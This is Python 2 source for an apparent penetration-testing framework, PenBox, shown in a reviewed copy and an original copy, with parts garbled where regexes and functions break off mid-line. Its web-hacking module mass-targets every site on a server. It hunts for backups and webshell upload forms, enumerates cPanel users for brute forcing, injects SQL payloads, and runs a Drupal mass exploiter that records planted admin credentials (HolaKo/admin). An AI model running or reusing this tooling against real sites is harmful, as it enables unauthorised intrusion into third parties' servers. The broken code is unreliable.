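    # get websites from server
    def getSites(self, a) :
        """
        get all websites on same server
        from bing search
        """
        lista = []
        page = 1
        while page <= 101:
            try:
                bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page)
                openbing = urllib2.urlopen(bing)
                readbing = openbing.read()
                findwebs = re.findall('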

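", site + admin
            except IOError :
                pass
    ############################
    # find ZIP files
    def findZip(self) :
        """
        Probe every grabbed site for common backup archive names and print
        the ones that answer HTTP 200.  A 200 only shows the path responds
        (many hosts return 200 for custom error pages), so treat hits as
        leads to confirm, not as proof of an exposed backup.
        """
        zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar']
        clearScr()
        print "[~] Finding zip file"
        for site in self.sites :
            for zip1 in zipList :
                try:
                    if urllib.urlopen(site + zip1).getcode() == 200 :
                        print " [*] Found zip file -> ", site + zip1
                except IOError :
                    # Unreachable host / HTTP error: skip this candidate.
                    pass
    ############################
    # find upload directories
    def findUp(self) :
        """
        Probe every grabbed site for common upload-script names and report
        the ones whose HTML contains a file input (a possible webshell
        upload point).  Each candidate is fetched once; the original fetched
        every 200 response a second time to read its body.
        """
        upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php']
        clearScr()
        print "[~] Finding Upload"
        for site in self.sites :
            for up in upList :
                try :
                    resp = urllib.urlopen(site + up)
                    if resp.getcode() == 200 :
                        for line in resp.readlines() :
                            if re.findall('type=file', line) :
                                print " [*] Found upload -> ", site+up
                except IOError :
                    pass
    ############################
    # find users
    def getUsers(self) :
        """
        get server users using a method found by
        iranian hackers i think, the attacker may
        do a bruteforce attack on CPanel, ssh, ftp or
        even mysql if 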
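it supports remote login
        (you can use medusa or hydra)
        """
        clearScr()
        print "[~] Grabbing Users"
        userslist = []
        for site1 in self.sites :
            try:
                # Derive a candidate account name from the domain (scheme,
                # dots, dashes and slashes stripped), then shorten it one
                # character at a time until the guestbook script stops
                # answering "invalid username".
                site = site1
                site = site.replace('http://www.', '')
                site = site.replace('http://', '')
                site = site.replace('.', '')
                site = site.replace('-', '')
                site = site.replace('/', '')
                while len(site) > 2:
                    resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read()
                    if 'invalid username' not in resp.lower():
                        print '\t [*] Found -> ', site
                        userslist.append(site)
                        break
                    else :
                        print site

                    site = site[:-1]
            except (IOError, httplib.HTTPException):
                # Best-effort probe: unreachable or misbehaving hosts are
                # skipped.  Narrowed from a bare except, which also swallowed
                # KeyboardInterrupt and hid real bugs.
                pass

        clearScr()
        for user in userslist :
            print user
    ############################
    # bypass cloudflare
    def cloudflareBypasser(self) :
        """
        Try to find the origin address behind Cloudflare by resolving a few
        common subdomains (mail, ftp, cpanel, ...) that are often not proxied
        and comparing them with the site's own A record.  A differing
        address is only a hint; it may be a separate host entirely.
        """
        clearScr()
        print "[~] Bypassing cloudflare"
        subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel']
        for site in self.sites :
            # str.replace returns a new string; the original discarded the
            # result, so "http://" and "/" were never stripped and the
            # sub.site names below were built from a URL, not a hostname.
            site = site.replace('http://', '')
            site = site.replace('/', '')
            try:
                ip = socket.gethostbyname(site)
            except socket.error:
                # Unresolvable site: the original left `ip` unbound (NameError
                # on the first site, a stale value afterwards).  Skip it.
                continue
            for sub in subdoms:
                doo = sub + '.' 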
+ site 701 | print ' [~] Trying -> ', doo 702 | try: 703 | ddd = socket.gethostbyname(doo) 704 | if ddd != ip: 705 | print ' [*] Cloudflare bypassed -> ', ddd 706 | break 707 | except socket.error : 708 | pass 709 | ############################ 710 | #find the server banner 711 | def getServerBanner(self) : 712 | """ 713 | simply gets the server banner 714 | the attacker may benefit from it 715 | like getting the server side software 716 | """ 717 | clearScr() 718 | try: 719 | s = 'http://' + self.serverip 720 | httpresponse = urllib.urlopen(s) 721 | print ' [*] Server header -> ', httpresponse.headers.getheader('server') 722 | except: 723 | pass 724 | ############################ 725 | #greb the sqli 726 | def grabSqli(self) : 727 | """ 728 | just grabs all websites in server with php?id= dork 729 | for scanning for error based sql injection 730 | """ 731 | page = 1 732 | lista = [] 733 | while page <= 101: 734 | try: 735 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page) 736 | openbing = urllib2.urlopen(bing) 737 | readbing = openbing.read() 738 | findwebs = re.findall('

<", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 760 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 761 | for url in s: 762 | try: 763 | for param in url.split('?')[1].split('&'): 764 | for payload in payloads: 765 | power = url.replace(param, param + payload.strip()) 766 | #print power 767 | html = urllib2.urlopen(power).readlines() 768 | for line in html: 769 | checker = re.findall(check, line) 770 | if len(checker) != 0 : 771 | print ' [*] SQLi found -> ', power 772 | except: 773 | pass 774 | ############################ 775 | #craw SQL 776 | def crawlSqli(self, nbpages) : 777 | """ 778 | simple crawling using chilkat (yeah chilkat sucks) 779 | and scan for error based sql injection 780 | [!] will be on the next version 781 | """ 782 | import chilkat 783 | spider = chilkat.CkSpider() 784 | for url in self.sites : 785 | spidred = [] 786 | print " [~] Crawling -> ", url 787 | spider.Initialize(url) 788 | #spider.unspideredUrl(url) 789 | i = 0 790 | for i in range(nbpages) : 791 | if spider.CrawlNext() : 792 | spidred.append(spider.lastUrl()) 793 | print " [+] Crawled -> ", spidred 794 | print " [~] Scanning -> ", url, " from SQL injection" 795 | self.checkSqli(spidred) 796 | ############################ 797 | #scan for ports 798 | def portScanner(self, mode, ran) : 799 | """ 800 | simple port scanner works with range of ports 801 | or with common ports (al-swisre idea) 802 | """ 803 | clearScr() 804 | print "[~] Scanning Ports" 805 | def do_it(ip, port): 806 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 807 | #sock.settimeout(5) 808 | sock = sock.connect_ex((ip,port)) 809 | if sock == 0: 810 | print " [*] Port %i is open" % port 811 | 812 | if mode == 1 : 813 | a = ran.split('-') 814 | start = int(a[0]) 815 | end = int(a[1]) 816 | for i in range(start, end): 817 | do_it(self.serverip, i) 818 | elif mode == 2 : 819 | for 
port in [80,21,22,2082,25,53,110,443,143] : 820 | # didn't use multithreading cos it's few ports 821 | do_it(self.serverip, port) 822 | ############################ 823 | 824 | 825 | minu =''' 826 | \t 1: Drupal Bing Exploiter 827 | \t 2: Get Drupal Websites 828 | \t 3: Drupal Mass Exploiter 829 | \t 99: Back To Main Menu 830 | ''' 831 | 832 | 833 | #Definition Of Drupal Bing Expoliter 834 | def drupal(): 835 | 836 | '''Drupal Exploit Binger All Websites Of server ''' 837 | ip = raw_input('1- IP : ') 838 | page = 1 839 | while page <= 50 : 840 | 841 | url = "http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page) 842 | req = urllib2.Request(url) 843 | opreq = urllib2.urlopen(req).read() 844 | findurl = re.findall('

"+site 858 | 859 | print "user:HolaKo\npass:admin" 860 | a = open('up.txt','a') 861 | a.write(site+'\n') 862 | a.write("user:"+user+"\npass:"+pwd+"\n") 863 | else : 864 | print "[-] Expl Not Found :( " 865 | 866 | except Exception as ex : 867 | print ex 868 | sys.exit(0) 869 | 870 | 871 | #Drupal Server ExtraCtor 872 | def getdrupal(): 873 | ip = raw_input('2- Ip : ') 874 | page = 1 875 | sites = list() 876 | while page <= 50 : 877 | 878 | url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page) 879 | req = urllib2.Request(url) 880 | opreq = urllib2.urlopen(req).read() 881 | findurl = re.findall('

"+url 904 | print "[-]username:HolaKo\n[-]password:admin" 905 | save = open('drupal.txt','a') 906 | save.write(url+"\n"+"[-]username:HolaKo\n[-]password:admin\n") 907 | 908 | else : 909 | print i + "=> exploit not found " 910 | except Exception as ex : 911 | print ex 912 | 913 | def maine(): 914 | 915 | print minu 916 | choose = raw_input("choose a number :") 917 | while True : 918 | 919 | if choose == "1": 920 | drupal() 921 | if choose == "2": 922 | getdrupal() 923 | if choose == "3": 924 | drupallist() 925 | if choose == "4": 926 | about() 927 | if choose == "99": 928 | 929 | menu() 930 | con = raw_input('Continue [Y/n] -> ') 931 | if con[0].upper() == 'N' : 932 | exit() 933 | if con[0].upper() == 'Y' : 934 | maine() 935 | 936 | 937 | #initialise the tnscan function 938 | class tnn(): 939 | def __init__(self): 940 | clearScr() 941 | aaa = raw_input("Target IP : ") 942 | TNscan(aaa) 943 | ############################ 944 | #begin :D 945 | if __name__ == "__main__": 946 | OS() 947 | 948 | 949 | 950 | 951 | 952 | -------------------------------------------------------------------------------- /Versions/V1.2/penbox.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2.7 2 | # 3 | # All In One Tool For Penetration Testing 4 | # Authors : Fedy Wesleti , Mohamed Nour 5 | # 6 | import sys 7 | import os 8 | import time 9 | import httplib 10 | import subprocess 11 | import re, urllib2 12 | import socket 13 | import urllib,sys,json 14 | import telnetlib 15 | import glob 16 | import random 17 | import Queue 18 | import threading 19 | from getpass import getpass 20 | from commands import * 21 | from sys import argv 22 | from platform import system 23 | from urlparse import urlparse 24 | from xml.dom import minidom 25 | from optparse import OptionParser 26 | from time import sleep 27 | ########################## 28 | #Variables 29 | yes = set(['yes','y', 'ye', 'Y']) 30 | no = set(['no','n']) 31 | def logo(): 32 | print 
""" 33 | ######## ######## ## ## ######## ####### ## ## 34 | ## ## ## ### ## ## ## ## ## ## ## 35 | ## ## ## #### ## ## ## ## ## ## ## 36 | ######## ###### ## ## ## ######## ## ## ### 37 | ## ## ## #### ## ## ## ## ## ## 38 | ## ## ## ### ## ## ## ## ## ## 39 | ## ######## ## ## ######## ####### ## ## v1.2 40 | A Penetration Testing Framework 41 | 42 | [+] Coded BY Fedy Wesleti & Mohamed Nour [+] 43 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 44 | [+] Greetz To All Pentesters [+] 45 | """ 46 | def menu(): 47 | print (""" 48 | ######## ######## ## ## ######## ####### ## ## 49 | ## ## ## ### ## ## ## ## ## ## ## 50 | ## ## ## #### ## ## ## ## ## ## ## 51 | ######## ###### ## ## ## ######## ## ## ### 52 | ## ## ## #### ## ## ## ## ## ## 53 | ## ## ## ### ## ## ## ## ## ## 54 | ## ######## ## ## ######## ####### ## ## v1.2 55 | A Penetration Testing Framework 56 | 57 | [+] Coded BY Fedy Wesleti & Mohamed Nour [+] 58 | [+] FB/CEH.TN ~~ FB/mohamed.zeus.0 [+] 59 | [+] Greetz To All Pentesters [+] 60 | 61 | Select from the menu: 62 | 63 | 1 : Information Gathering 64 | 2 : Password Attacks 65 | 3 : Wireless Testing 66 | 4 : Exploitation Tools 67 | 5 : Sniffing & Spoofing 68 | 6 : Web Hacking 69 | 7 : Privat Tools 70 | 99 : Exit 71 | 72 | """) 73 | choice = raw_input("Enter Your Choice:") 74 | 75 | if choice == "1": 76 | info() 77 | elif choice == "2": 78 | passwd() 79 | elif choice == "3": 80 | wire() 81 | elif choice == "4": 82 | exp() 83 | elif choice == "5": 84 | snif() 85 | elif choice == "6": 86 | webhack() 87 | elif choice == "7": 88 | tnn() 89 | elif choice == "99": 90 | clearScr(),sys.exit(); 91 | elif choice == "": 92 | menu() 93 | else: 94 | menu() 95 | def h2ip(): 96 | host = raw_input("Select A Host : ") 97 | ips = socket.gethostbyname(host) 98 | print(ips) 99 | def ports(): 100 | clearScr() 101 | target = raw_input('Select a Target IP :') 102 | os.system("nmap -O -Pn %s" % target) 103 | sys.exit(); 104 | def ifinurl(): 105 | print""" This Advanced search in 
search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.""" 106 | print('do you have Inurlbr installed ? ') 107 | cinurl = raw_input("Y / N : ") 108 | if cinurl in yes: 109 | inurl() 110 | if cinurl in no: 111 | insinurl() 112 | elif cinurl == "": 113 | menu() 114 | else: 115 | menu() 116 | def commix(): 117 | print ("Automated All-in-One OS Command Injection and Exploitation Tool.") 118 | print ("usage : python commix.py --help") 119 | choicecmx = raw_input("Continue: y/n :") 120 | if choicecmx in yes: 121 | os.system("git clone https://github.com/stasinopoulos/commix.git commix") 122 | elif choicecmx in no: 123 | os.system('clear'); info() 124 | 125 | def pixiewps(): 126 | print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only 127 | """ 128 | choicewps = raw_input("Continue ? 
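Y/N : ")
    if choicewps in yes :
        # NOTE(review): unpinned clone of a third-party repository that is
        # built and installed system-wide straight away; pin a tag or commit
        # and review it first.
        os.system("git clone https://github.com/wiire/pixiewps.git")
        # `cd dir & make` backgrounds the cd and runs make in the current
        # directory, so nothing was built; `&&` chains the steps as intended.
        os.system("cd pixiewps/src && make")
        os.system("cd pixiewps/src && sudo make install")
    # In the original every other branch (no, empty, anything else) and the
    # fall-through after a successful install all ended in menu().
    menu()

def webhack():
    """Web-hacking submenu: print the options, read one choice, dispatch it.

    Every tool returns to the main menu when it finishes; "99", empty input
    and unrecognised input go straight back to it.
    """
    print("1 : Drupal Hacking ")
    print("2 : Inurlbr")
    print("3 : Wordpress & Joomla Scanner")
    print("4 : Gravity Form Scanner")
    print("5 : File Upload Checker")
    print("6 : Wordpress Exploit Scanner")
    print("99 : Exit")
    choiceweb = raw_input("Enter Your Choice : ")
    # One if/elif chain, the same shape menu() uses. The original was a run
    # of independent `if` statements whose trailing else re-opened the main
    # menu after choices 1-5 returned but not after 6; all six now behave
    # the same.
    if choiceweb == "1":
        clearScr(); maine()
    elif choiceweb == "2":
        clearScr(); ifinurl()
    elif choiceweb == '3':
        clearScr(); wppjmla()
    elif choiceweb == "4":
        clearScr(); gravity()
    elif choiceweb == "5":
        clearScr(); sqlscan()
    elif choiceweb == "6":
        clearScr(); wpminiscanner()
    menu()

def inurl():
    """Run an already-installed ``./inurlbr.php`` with an operator-supplied dork.

    The dork and the output file name come straight from raw_input, so they
    are handed to the program as separate argv entries instead of being
    interpolated into a shell string: a quote, ``;`` or ``$(...)`` in either
    value can no longer alter the command that is executed.
    """
    dork = raw_input("select a Dork:")
    output = raw_input("select a file to save :")
    subprocess.call(["./inurlbr.php", "--dork", dork,
                     "-s", output + ".txt", "-q", "1,6", "-t", "1"])
    # The original went on to test ``cinurl``, which is a local of ifinurl()
    # and not in scope here, and therefore raised NameError after every run.
    # ifinurl() already owns the install question and returns to the menu,
    # so there is nothing left to decide here.

def insinurl():
    """Clone and prepare SCANNER-INURLBR, then hand over to inurl()."""
    # NOTE(review): unpinned clone of a third-party repository that is made
    # executable and run immediately; pin a tag or commit and review it.
    os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git")
    os.system("chmod +x SCANNER-INURLBR/inurlbr.php")
    os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl")
    # The clone lands in ./SCANNER-INURLBR (the chmod above already uses that
    # path); the original moved "/SCANNER-INURLBR/inurbr.php", an absolute
    # path with a misspelt file name that never exists.
    os.system("mv SCANNER-INURLBR/inurlbr.php inurlbr.php")
    clearScr()
    inurl()

def nmap():

    choice7 = raw_input("continue ? 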
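Y / N : ")
    if choice7 in yes :
        # NOTE(review): the tarball is downloaded over HTTPS but never checked
        # against the signature/checksum nmap publishes for its releases;
        # verify it before building, since the result is installed system-wide.
        os.system("wget https://nmap.org/dist/nmap-7.01.tar.bz2")
        os.system("bzip2 -cd nmap-7.01.tar.bz2 | tar xvf -")
        # `cd dir & cmd` backgrounds the cd and runs cmd in the current
        # directory, so configure/make never ran in the tree; `&&` chains them.
        os.system("cd nmap-7.01 && ./configure")
        os.system("cd nmap-7.01 && make")
        # The original called os.system("su root"), which opened an interactive
        # root shell; `make install` only ran after the operator exited it, as
        # the original user. Elevate just the install step instead.
        os.system("cd nmap-7.01 && sudo make install")
    elif choice7 in no :
        info()
    else:
        # empty input and anything unrecognised both return to the menu
        menu()

def jboss():
    """Describe jboss-autopwn, clone it on confirmation, then exit."""
    os.system('clear')
    print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once")
    print ("deployed, the script uses its upload and command execution capability to")
    print ("provide an interactive session.")
    print ("")
    print ("usage : ./e.sh target_ip tcp_port ")
    print("Continue: y/n")
    choice9 = raw_input("yes / no :")
    if choice9 in yes:
        # NOTE(review): unpinned clone of a third-party repository; pin a tag
        # or commit and review it before running anything it contains.
        os.system("git clone https://github.com/SpiderLabs/jboss-autopwn.git")
        # The original wrote `os.system(...),sys.exit();` - a tuple expression
        # that only worked by accident; make the exit an explicit statement.
        sys.exit()
    elif choice9 in no:
        os.system('clear'); exp()
    else:
        # empty input and anything unrecognised both return to the menu
        menu()

def sqlmap():
    """Clone sqlmap into ./sqlmap-dev on confirmation."""
    print ("usage : python sqlmap.py -h")
    choice8 = raw_input("Continue: y/n :")
    if choice8 in yes:
        # The trailing "& " in the original backgrounded the clone, so the
        # call returned before anything had been downloaded.
        os.system("git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev")
    elif choice8 in no:
        os.system('clear'); info()
    else:
        # empty input and anything unrecognised both return to the menu
        menu()

def setoolkit():
    print ("The Social-Engineer Toolkit is an open-source penetration testing framework")
    print(") designed for social engineering. SET has a number of custom attack vectors that ")
    print(" allow you to make a believable attack quickly. 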
SET is a product of TrustedSec, LLC ") 232 | print("an information security consulting firm located in Cleveland, Ohio.") 233 | print("") 234 | choiceset = raw_input("y / n :") 235 | if choiceset in yes: 236 | os.system("git clone https://github.com/trustedsec/social-engineer-toolkit.git") 237 | os.system("python social-engineer-toolkit/setup.py") 238 | if choiceset in no: 239 | clearScr(); info() 240 | elif choiceset == "": 241 | menu() 242 | else: 243 | menu() 244 | def cupp(): 245 | print("cupp is a password list generator ") 246 | print("Usage: python cupp.py -h") 247 | choicecupp = raw_input("Continue: y/n : ") 248 | 249 | if choicecupp in yes: 250 | os.system("git clone https://github.com/Mebus/cupp.git") 251 | print("file downloaded successfully") 252 | elif choicecupp in no: 253 | clearScr(); passwd() 254 | elif choicecupp == "": 255 | menu() 256 | else: 257 | menu() 258 | def ncrack(): 259 | print("A Ruby interface to Ncrack, Network authentication cracking tool.") 260 | print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3") 261 | print("Continue: y/n") 262 | choicencrack = raw_input("y / n :") 263 | if choicencrack in yes: 264 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git") 265 | os.system("cd ruby-ncrack") 266 | os.system("install ruby-ncrack") 267 | elif choicencrack in no: 268 | clearScr(); passwd() 269 | elif choicencrack == "": 270 | menu() 271 | else: 272 | menu() 273 | def reaver(): 274 | print """ 275 | Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup 276 | WPS registrar PINs in order to recover WPA/WPA2 passphrases. 
It has been tested against a 277 | wide variety of access points and WPS implementations 278 | 1 to accept / 0 to decline 279 | """ 280 | creaver = raw_input("y / n :") 281 | if creaver in yes: 282 | os.system("apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps") 283 | os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git") 284 | os.system("cd reaver-wps-fork-t6x/src/ & ./configure") 285 | os.system("cd reaver-wps-fork-t6x/src/ & make") 286 | elif creaver in no: 287 | clearScr(); wire() 288 | elif creaver == "": 289 | menu() 290 | else: 291 | menu() 292 | def ssls(): 293 | print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 294 | attacks. 295 | It requires Python 2.5 or newer, along with the 'twisted' python module.""" 296 | cssl = raw_input("y / n :") 297 | if cssl in yes: 298 | os.system("git clone https://github.com/moxie0/sslstrip.git") 299 | os.system("sudo apt-get install python-twisted-web") 300 | os.system("python sslstrip/setup.py") 301 | if cssl in no: 302 | snif() 303 | elif cssl =="": 304 | menu() 305 | else: 306 | menu() 307 | def unique(seq): 308 | seen = set() 309 | return [seen.add(x) or x for x in seq if x not in seen] 310 | def bing_all_grabber(s): 311 | 312 | lista = [] 313 | page = 1 314 | while page <= 101: 315 | try: 316 | bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page) 317 | openbing = urllib2.urlopen(bing) 318 | readbing = openbing.read() 319 | findwebs = re.findall('

') 525 | if choice == '1' : 526 | self.getSites(True) 527 | elif choice == '2' : 528 | self.getJoomla() 529 | elif choice == '3' : 530 | self.getWordpress() 531 | elif choice == '4' : 532 | self.findPanels() 533 | elif choice == '5' : 534 | self.findZip() 535 | elif choice == '6' : 536 | self.findUp() 537 | elif choice == '7' : 538 | self.getUsers() 539 | elif choice == '8' : 540 | self.grabSqli() 541 | elif choice == '9' : 542 | ran = raw_input(' Enter range of ports, (ex : 1-1000) -> ') 543 | self.portScanner(1, ran) 544 | elif choice == '10' : 545 | self.portScanner(2, None) 546 | elif choice == '11' : 547 | self.getServerBanner() 548 | elif choice == '12' : 549 | self.cloudflareBypasser() 550 | elif choice == '99' : 551 | menu() 552 | con = raw_input(' Continue [Y/n] -> ') 553 | if con[0].upper() == 'N' : 554 | exit() 555 | else : 556 | clearScr() 557 | print menuu 558 | def getSites(self, a) : 559 | """ 560 | get all websites on same server 561 | from bing search 562 | """ 563 | lista = [] 564 | page = 1 565 | while page <= 101: 566 | try: 567 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+&count=50&first=" + str(page) 568 | openbing = urllib2.urlopen(bing) 569 | readbing = openbing.read() 570 | findwebs = re.findall('

", site + admin 656 | except IOError : 657 | pass 658 | ############################ 659 | #find ZIP files 660 | def findZip(self) : 661 | """ 662 | find zip files from grabbed websites 663 | it may contain useful informations 664 | """ 665 | zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] 666 | clearScr() 667 | print "[~] Finding zip file" 668 | for site in self.sites : 669 | for zip1 in zipList : 670 | try: 671 | if urllib.urlopen(site + zip1).getcode() == 200 : 672 | print " [*] Found zip file -> ", site + zip1 673 | except IOError : 674 | pass 675 | ############################ 676 | #find upload directories 677 | def findUp(self) : 678 | """ 679 | find upload forms from grabbed 680 | websites the attacker may succeed to 681 | upload malicious files like webshells 682 | """ 683 | upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php','blog/up.php', 'upload.php', 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] 684 | clearScr() 685 | print "[~] Finding Upload" 686 | for site in self.sites : 687 | for up in upList : 688 | try : 689 | if (urllib.urlopen(site + up).getcode() == 200) : 690 | html = urllib.urlopen(site + up).readlines() 691 | for line in html : 692 | if re.findall('type=file', line) : 693 | print " [*] Found upload -> ", site+up 694 | except IOError : 695 | pass 696 | ############################ 697 | #find users 698 | def getUsers(self) : 699 | """ 700 | get server users using a method found by 701 | iranian hackers , the attacker may 702 | do a bruteforce attack on CPanel, ssh, ftp or 703 | even mysql if it 
supports remote login 704 | (you can use medusa or hydra) 705 | """ 706 | clearScr() 707 | print "[~] Grabbing Users" 708 | userslist = [] 709 | for site1 in self.sites : 710 | try: 711 | site = site1 712 | site = site.replace('http://www.', '') 713 | site = site.replace('http://', '') 714 | site = site.replace('.', '') 715 | if '-' in site: 716 | site = site.replace('-', '') 717 | site = site.replace('/', '') 718 | while len(site) > 2: 719 | resp = urllib2.urlopen(site1 + '/cgi-sys/guestbook.cgi?user=%s' % site).read() 720 | if 'invalid username' not in resp.lower(): 721 | print '\t [*] Found -> ', site 722 | userslist.append(site) 723 | break 724 | else : 725 | print site 726 | 727 | site = site[:-1] 728 | except: 729 | pass 730 | 731 | clearScr() 732 | for user in userslist : 733 | print user 734 | ############################ 735 | #bypass cloudflare 736 | def cloudflareBypasser(self) : 737 | """ 738 | trys to bypass cloudflare i already wrote 739 | in my blog how it works, i learned this 740 | method from a guy in madleets 741 | """ 742 | clearScr() 743 | print "[~] Bypassing cloudflare" 744 | subdoms = ['mail', 'webmail', 'ftp', 'direct', 'cpanel'] 745 | for site in self.sites : 746 | site.replace('http://', '') 747 | site.replace('/', '') 748 | try: 749 | ip = socket.gethostbyname(site) 750 | except socket.error: 751 | pass 752 | for sub in subdoms: 753 | doo = sub + '.' 
+ site 754 | print ' [~] Trying -> ', doo 755 | try: 756 | ddd = socket.gethostbyname(doo) 757 | if ddd != ip: 758 | print ' [*] Cloudflare bypassed -> ', ddd 759 | break 760 | except socket.error : 761 | pass 762 | ############################ 763 | #find the server banner 764 | def getServerBanner(self) : 765 | """ 766 | simply gets the server banner 767 | the attacker may benefit from it 768 | like getting the server side software 769 | """ 770 | clearScr() 771 | try: 772 | s = 'http://' + self.serverip 773 | httpresponse = urllib.urlopen(s) 774 | print ' [*] Server header -> ', httpresponse.headers.getheader('server') 775 | except: 776 | pass 777 | ############################ 778 | #greb the sqli 779 | def grabSqli(self) : 780 | """ 781 | just grabs all websites in server with php?id= dork 782 | for scanning for error based sql injection 783 | """ 784 | page = 1 785 | lista = [] 786 | while page <= 101: 787 | try: 788 | bing = "http://www.bing.com/search?q=ip%3A" + self.serverip + "+php?id=&count=50&first=" + str(page) 789 | openbing = urllib2.urlopen(bing) 790 | readbing = openbing.read() 791 | findwebs = re.findall('

<", "3%22%5C%27%5C%22%29%3B%7C%5D%2A%7B%250d%250a%3C%2500%3E%25bf%2527%27"] 813 | check = re.compile("Incorrect syntax|mysql_fetch|Syntax error|Unclosed.+mark|unterminated.+qoute|SQL.+Server|Microsoft.+Database|Fatal.+error", re.I) 814 | for url in s: 815 | try: 816 | for param in url.split('?')[1].split('&'): 817 | for payload in payloads: 818 | power = url.replace(param, param + payload.strip()) 819 | #print power 820 | html = urllib2.urlopen(power).readlines() 821 | for line in html: 822 | checker = re.findall(check, line) 823 | if len(checker) != 0 : 824 | print ' [*] SQLi found -> ', power 825 | except: 826 | pass 827 | ############################ 828 | ############################ 829 | #scan for ports 830 | def portScanner(self, mode, ran) : 831 | """ 832 | simple port scanner works with range of ports 833 | or with common ports (al-swisre idea) 834 | """ 835 | clearScr() 836 | print "[~] Scanning Ports" 837 | def do_it(ip, port): 838 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 839 | #sock.settimeout(5) 840 | sock = sock.connect_ex((ip,port)) 841 | if sock == 0: 842 | print " [*] Port %i is open" % port 843 | 844 | if mode == 1 : 845 | a = ran.split('-') 846 | start = int(a[0]) 847 | end = int(a[1]) 848 | for i in range(start, end): 849 | do_it(self.serverip, i) 850 | elif mode == 2 : 851 | for port in [80,21,22,2082,25,53,110,443,143] : 852 | # didn't use multithreading cos it's few ports 853 | do_it(self.serverip, port) 854 | ############################ 855 | minu =''' 856 | \t 1: Drupal Bing Exploiter 857 | \t 2: Get Drupal Websites 858 | \t 3: Drupal Mass Exploiter 859 | \t 99: Back To Main Menu 860 | ''' 861 | 862 | 863 | #Definition Of Drupal Bing Expoliter 864 | def drupal(): 865 | 866 | '''Drupal Exploit Binger All Websites Of server ''' 867 | ip = raw_input('1- IP : ') 868 | page = 1 869 | while page <= 50 : 870 | 871 | url = 
"http://www.bing.com/search?q=ip%3A"+ip+"&go=Valider&qs=n&form=QBRE&pq=ip%3A"+ip+"&sc=0-0&sp=-1&sk=&cvid=af529d7028ad43a69edc90dbecdeac4f&first="+str(page) 872 | req = urllib2.Request(url) 873 | opreq = urllib2.urlopen(req).read() 874 | findurl = re.findall('

"+site 888 | 889 | print "user:HolaKo\npass:admin" 890 | a = open('up.txt','a') 891 | a.write(site+'\n') 892 | a.write("user:"+user+"\npass:"+pwd+"\n") 893 | else : 894 | print "[-] Expl Not Found :( " 895 | 896 | except Exception as ex : 897 | print ex 898 | sys.exit(0) 899 | 900 | 901 | #Drupal Server ExtraCtor 902 | def getdrupal(): 903 | ip = raw_input('Enter The Ip : ') 904 | page = 1 905 | sites = list() 906 | while page <= 50 : 907 | 908 | url = "http://www.bing.com/search?q=ip%3A"+ip+"+node&go=Valider&qs=ds&form=QBRE&first="+str(page) 909 | req = urllib2.Request(url) 910 | opreq = urllib2.urlopen(req).read() 911 | findurl = re.findall('

